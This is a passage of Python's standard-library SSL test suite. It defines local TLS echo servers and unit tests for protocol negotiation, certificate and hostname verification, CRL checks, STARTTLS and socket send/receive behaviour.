self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
